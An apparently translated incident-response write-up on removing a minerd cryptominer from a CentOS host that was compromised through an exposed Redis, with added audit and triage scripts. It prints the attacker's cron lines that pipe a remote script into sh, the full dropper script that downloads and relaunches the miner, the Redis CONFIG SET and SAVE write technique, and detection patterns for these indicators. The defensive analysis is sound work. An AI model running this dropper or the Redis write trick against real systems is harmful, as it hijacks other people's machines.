Thoroughly removing the minerd trojan from a CentOS Linux host: a hands-on case tied to Redis settings
Run top -c to find the process using the most CPU:

Tasks: 136 total, 2 running, 133 sleeping, 0 stopped, 1 zombie
Cpu(s): 72.2%us, 5.9%sy, 0.0%ni, 17.5%id, 0.0%wa, 0.0%hi, 0.1%si, 4.3%st
Mem: 16330820k total, 4093308k used, 12237512k free, 339564k buffers
Swap: 0k total, 0k used, 0k free, 1121232k cached

  PID USER      PR  NI  VIRT  RES  SHR S  %CPU %MEM    TIME+  COMMAND
11159 root      20   0  381m 9664 1068 S 299.5  0.1 12416:17 ./minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-poo

PID 11159 runs as root at almost 300% CPU (three cores busy) and its command line gives it away: minerd with the cryptonight algorithm, pointed at a stratum mining pool. top truncates the command line; ps -o args= -p 11159 shows the full pool address and wallet.
Locate the binary:

# locate minerd
/home/minerd
# chmod -x minerd

locate only searches the updatedb index, so a freshly dropped file can be missing from it; find / -name minerd is the reliable way, and once the dropper script below has been read, /opt needs the same check. Removing the execute bit keeps the file from being relaunched, but it does nothing to the process that is already running; that is dealt with further down.
Check the cron log:

sh-4.1# tail -f /var/log/cron
Jan 8 16:01:01 xxxx run-parts(/etc/cron.hourly)[13303]: finished 0anacron
Jan 8 16:05:01 xxxx CROND[13307]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh)
Jan 8 16:10:01 xxxx CROND[13332]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh)
Jan 8 16:10:01 xxxx CROND[13333]: (root) CMD (/usr/lib64/sa/sa1 1 1)
Jan 8 16:15:01 xxxx CROND[13380]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh)
Jan 8 16:20:01 xxxx CROND[13407]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh)
Jan 8 16:20:01 xxxx CROND[13408]: (root) CMD (/usr/lib64/sa/sa1 1 1)
Jan 8 16:25:01 xxxx CROND[13432]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh)
Jan 8 16:30:01 xxxx CROND[13470]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh)
Jan 8 16:30:01 xxxx CROND[13471]: (root) CMD (/usr/lib64/sa/sa1 1 1)

Every five minutes root's cron fetches a script over plain HTTP and pipes it straight into sh. The /usr/lib64/sa/sa1 entries are the normal sysstat job and can be ignored.
sh-4.1# crontab -l
REDIS0007�redis-ver3.2.5��crackit@G�ctime��qXused-mem�
*/5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh

The garbage in front of the cron line is the tell: REDIS0007, redis-ver3.2.5, a key named crackit, and the ctime and used-mem fields are the header of a Redis RDB dump file. Root's crontab was not edited with crontab -e; it was written by Redis itself, which an attacker pointed at /var/spool/cron with CONFIG SET dir and CONFIG SET dbfilename and then told to SAVE, the cron line being the value stored under the crackit key. cron cannot parse the binary header lines, but the one valid entry still runs, as the log above shows. This is the Redis configuration problem the title refers to: an instance reachable from the network without a password, running with enough privilege to write into /var/spool/cron.
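Since the REDIS0007 ... redis-ver3.2.5 prefix shows Redis wrote the crontab, the next question is which Redis settings let a remote client do that. The script below is an added example, not part of the original post and not Redis project code: it reads a redis.conf and reports the four settings that together make the CONFIG SET dir/dbfilename + SAVE trick possible (protected-mode off, bind on all interfaces, no requirepass, CONFIG still callable). The two config files it audits are constructed for the demo; the directive names are real Redis directives, and the replace-with-a-long-random-secret password is a placeholder.

```shell
#!/bin/sh
# Added example (not from the original post): audit a redis.conf for the
# settings that let any client on the network run CONFIG SET dir/dbfilename
# followed by SAVE and so drop an RDB file into /var/spool/cron or /root/.ssh.
# Assumes POSIX sh with awk, grep and mktemp. The two config files are
# constructed below; point audit_redis_conf at /etc/redis.conf on a real host.

# Effective value of a directive: Redis reads the file top to bottom, so the
# last uncommented occurrence wins. Prints an empty line if it is not set.
redis_directive() {  # $1 = conf file, $2 = directive name
    awk -v k="$2" 'tolower($1) == tolower(k) { $1 = ""; sub(/^[ \t]+/, ""); v = $0 }
                   END { print v }' "$1"
}

# Prints one finding per line, then the number of findings as the last line.
audit_redis_conf() {
    conf="$1"; n=0
    v="$(redis_directive "$conf" protected-mode | tr 'A-Z' 'a-z')"
    if [ "$v" = "no" ]; then
        echo "protected-mode no: the 3.2+ safety net for unbound, passwordless instances is off"
        n=$((n + 1))
    fi
    v="$(redis_directive "$conf" bind)"
    case "$v" in
        ''|*0.0.0.0*|*'*'*)
            echo "bind '$v': listening on every interface instead of 127.0.0.1"
            n=$((n + 1)) ;;
    esac
    if [ -z "$(redis_directive "$conf" requirepass)" ]; then
        echo "no requirepass: anyone who can reach the port is a trusted client"
        n=$((n + 1))
    fi
    if ! grep -iqE '^[[:space:]]*rename-command[[:space:]]+config[[:space:]]' "$conf"; then
        echo "CONFIG not renamed or disabled: clients can retarget dir/dbfilename and SAVE"
        n=$((n + 1))
    fi
    echo "$n"
}

# Constructed configs: the weak one matches what the crontab evidence implies
# (reachable, passwordless, CONFIG usable); the hardened one is the fix.
sample_conf() {  # $1 = weak | hardened; prints the path of a temp file
    f="$(mktemp)"
    if [ "$1" = weak ]; then
        printf '%s\n' 'port 6379' 'bind 0.0.0.0' 'protected-mode no' 'dir /var/lib/redis' > "$f"
    else
        printf '%s\n' 'port 6379' 'bind 127.0.0.1' 'protected-mode yes' \
            'requirepass replace-with-a-long-random-secret' \
            'rename-command CONFIG ""' 'dir /var/lib/redis' > "$f"
    fi
    echo "$f"
}

for kind in weak hardened; do
    c="$(sample_conf "$kind")"
    echo "== $kind redis.conf"
    audit_redis_conf "$c"
    rm -f "$c"
done
```

Run audit_redis_conf /etc/redis.conf on the host. The protected-mode check matters for the 3.2.5 seen in the header: since Redis 3.2 it defaults to yes and refuses non-loopback clients when neither bind nor requirepass is set, so a reachable passwordless 3.2.x instance means someone turned it off or bound 0.0.0.0. Renaming CONFIG breaks administrative tooling that relies on it, so do it deliberately. None of this fixes the privilege side: the dumps could only land in /var/spool/cron and /root/.ssh because Redis ran with root-level write access there, so it should also run as an unprivileged redis user.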
Fetch the script with wget and look at its contents:

#!/bin/bash
Jin=`ps -ef|grep minerd|grep -v grep|wc -l`
Pid=`ps -ef|grep minerd|grep -v grep|awk '{print $2}'`
Wk=`ps -ef|grep 44GpQ3X9aCR5fMfD8myxKQcAYjkTdT5KrM4NM2rM9yWnEkP28mmXu5URUCxwuvKiVCQPZaoYkpxxzKoCpnED6Gmb2wWJRuN|grep -v grep|wc -l`
if [ $Jin -eq 1 ];then
    if [ $Wk -eq 0 ];then
        kill -9 $Pid
        nohup /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 44GpQ3X9aCR5fMfD8myxKQcAYjkTdT5KrM4NM2rM9yWnEkP28mmXu5URUCxwuvKiVCQPZaoYkpxxzKoCpnED6Gmb2wWJRuN -p x &
    fi
else
    kill -9 $Pid
    nohup /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 44GpQ3X9aCR5fMfD8myxKQcAYjkTdT5KrM4NM2rM9yWnEkP28mmXu5URUCxwuvKiVCQPZaoYkpxxzKoCpnED6Gmb2wWJRuN -p x &
fi
if [ $Jin -eq 0 ];then
    mkdir /home -p \
    && cd /home \
    && curl -L http://sx.doiton.tk/minerd -o minerd\
    && chmod +x minerd \
    && nohup ./minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 44GpQ3X9aCR5fMfD8myxKQcAYjkTdT5KrM4NM2rM9yWnEkP28mmXu5URUCxwuvKiVCQPZaoYkpxxzKoCpnED6Gmb2wWJRuN -p x &
fi

Reading it: every five minutes it counts minerd processes (Jin) and checks whether one of them is mining to the attacker's wallet (Wk). If exactly one minerd is running but for a different wallet, or if more than one is running, it kills them and starts /opt/minerd; if none is running it re-downloads the binary to /home/minerd and starts that. So it is both a watchdog and a re-infector, and it references two locations, /home/minerd and /opt/minerd, both of which have to be cleaned. Note also that it pulls the binary over plain HTTP with no checksum, so there is no integrity check on either side.
Kill minerd:

sh-4.1# pkill minerd

Do this and the crontab cleanup that follows as one step: as long as the */5 job is still in place, the script restarts the miner within five minutes. Confirm with ps -ef | grep minerd that nothing is left.
Clear the crontab:

# crontab -r
sh-4.1# crontab -l
no crontab for root

crontab -r only deletes root's own spool file (/var/spool/cron/root). Also check /etc/crontab, /etc/cron.d/, the /etc/cron.hourly, daily, weekly and monthly directories, and the other users' files under /var/spool/cron/ for the same curl | sh line.
Looking in /root/.ssh, there is something abnormal:

sh-4.1# file root
root: data
sh-4.1# cat root
REDIS0007�redis-ver3.2.5��crackit@z�ctime® */5 * * * * /usr/bin/curl -fsSL http://d.nrfly.com/v/down.php?u=ad1b7c3c18fdfa9a7c7e5baf5fab9c42.undefined.mp3 | sh ��wx��]
sh-4.1# pwd
/root/.ssh

The same RDB header and the same crackit key, this time written into /root/.ssh (dir set to /root/.ssh, dbfilename to root) and carrying a different download URL. cron never reads this directory, so this copy was never executed, but it shows the Redis write was aimed at the SSH directory as well. Check /root/.ssh/authorized_keys for any key you did not put there: the same technique can drop an attacker's public key into that file.
Download that file and look at its contents:

[root@NB movies]# file down.php\?u\=ad1b7c3c18fdfa9a7c7e5baf5fab9c42.undefined.mp3
down.php?u=ad1b7c3c18fdfa9a7c7e5baf5fab9c42.undefined.mp3: HTML document text

It turns out to be an HTML page, not a shell script, so at the time of this check that URL was no longer serving a payload; piping HTML into sh only produces errors.
Remove the file:

sh-4.1# rm root

Deleting the artifacts and the cron job is only half the job: the Redis instance that allowed them to be written is unchanged, and the same thing will happen again. Bind Redis to 127.0.0.1 or firewall the port, set requirepass, rename or disable the CONFIG command, and run it as an unprivileged redis user so that a SAVE aimed at /var/spool/cron or /root/.ssh fails on permissions.
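Put together, the manual checks above amount to a short triage routine. The script below is an added example, not from the original post: it checks the cron spools, /etc/cron.d and /root/.ssh for files that start with the Redis RDB magic, pulls curl-or-wget-piped-to-shell entries out of a cron log or crontab, and flags miner indicators in a saved ps listing. Every sample file it builds is constructed to mirror this post's evidence; on a real host run scan_persistence / and point the other two functions at /var/log/cron and at the output of ps -eo pid,user,args.

```shell
#!/bin/sh
# Added triage example (not code from the original post). Reproduces the manual
# checks above as functions that take paths, so they run against / on a live
# host, against a mounted image, or against the constructed samples below.
# Assumes POSIX sh plus coreutils, grep and mktemp.

# A crontab, cron.d file or anything under .ssh that begins with the RDB magic
# "REDIS" was written by Redis (CONFIG SET dir/dbfilename, then SAVE); that is
# what the REDIS0007 ... redis-ver3.2.5 ... crackit prefix in crontab -l was.
is_redis_rdb() {
    [ -f "$1" ] && [ "$(head -c 5 "$1" 2>/dev/null)" = "REDIS" ]
}

# Entries that pipe a remote download straight into a shell (the
# "*/5 * * * * curl -fsSL ... | sh" pattern). Works on a cron log, a spool
# file or an RDB dump; -a makes grep treat the binary header as text.
pipe_to_shell_entries() {
    grep -aE '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh([^[:alnum:]_]|$)' "$1" || true
}

# Miner indicators in a saved "ps -eo pid,user,args" listing: the stratum pool
# URL and cryptonight algorithm from the top output, or a binary named minerd
# wherever it lives (the dropper script uses both /home and /opt).
miner_processes() {
    grep -aE 'stratum[+]tcp://|cryptonight|(^|[[:space:]/])minerd([^[:alnum:]_]|$)' "$1" || true
}

# Walk the persistence locations from the write-up under root dir $1 (use /
# for the live host). One finding per line; the finding count is the last line.
scan_persistence() {
    root="$1"; n=0
    for f in "$root"/var/spool/cron/* "$root"/etc/cron.d/* "$root"/root/.ssh/*; do
        [ -f "$f" ] || continue
        if is_redis_rdb "$f"; then
            echo "redis-rdb-written: $f"; n=$((n + 1))
        fi
        if [ -n "$(pipe_to_shell_entries "$f")" ]; then
            echo "pipe-to-shell: $f"; n=$((n + 1))
        fi
    done
    echo "$n"
}

# Constructed sample tree mirroring the evidence in the post (not host data).
make_sample_tree() {
    d="$(mktemp -d)"
    mkdir -p "$d/var/spool/cron" "$d/etc/cron.d" "$d/root/.ssh" "$d/var/log"
    # root's crontab as Redis SAVE leaves it: RDB header, key name, cron line
    printf 'REDIS0007\372\011redis-ver3.2.5\372crackit\n*/5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh\n' \
        > "$d/var/spool/cron/root"
    # the second dump, found in /root/.ssh
    printf 'REDIS0007\372\011redis-ver3.2.5\372crackit\n*/5 * * * * /usr/bin/curl -fsSL http://d.nrfly.com/v/down.php?u=x.mp3 | sh\n' \
        > "$d/root/.ssh/root"
    # a legitimate sysstat job that must not be flagged
    printf '*/10 * * * * root /usr/lib64/sa/sa1 1 1\n' > "$d/etc/cron.d/sysstat"
    printf '%s\n' \
        'Jan 8 16:05:01 xxxx CROND[13307]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh)' \
        'Jan 8 16:10:01 xxxx CROND[13333]: (root) CMD (/usr/lib64/sa/sa1 1 1)' \
        'Jan 8 16:10:01 xxxx CROND[13332]: (root) CMD (/usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh)' \
        > "$d/var/log/cron"
    printf '%s\n' \
        '  PID USER     ARGS' \
        '11159 root     ./minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u WALLET -p x' \
        '13308 root     /usr/lib64/sa/sa1 1 1' \
        > "$d/ps.txt"
    echo "$d"
}

# With a root directory argument, scan that host; with none, demo on the samples.
main() {
    if [ $# -gt 0 ]; then
        scan_persistence "$1"
    else
        sample="$(make_sample_tree)"
        echo "== persistence under $sample"; scan_persistence "$sample"
        echo "== pipe-to-shell in cron log"; pipe_to_shell_entries "$sample/var/log/cron"
        echo "== miner processes"; miner_processes "$sample/ps.txt"
        rm -rf "$sample"
    fi
}
main "$@"
```

The RDB-magic check is the one worth keeping around: a crontab or authorized_keys file should be plain text, and five bytes of REDIS at offset 0 is unambiguous. The grep patterns are deliberately loose (any curl or wget piped into sh, any stratum URL), so treat hits as leads to read, not as verdicts.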
Contact: QQ 326528263, email clnking@163.com, online handle: bass. Sharing techniques, tackling hard problems, thinking creatively.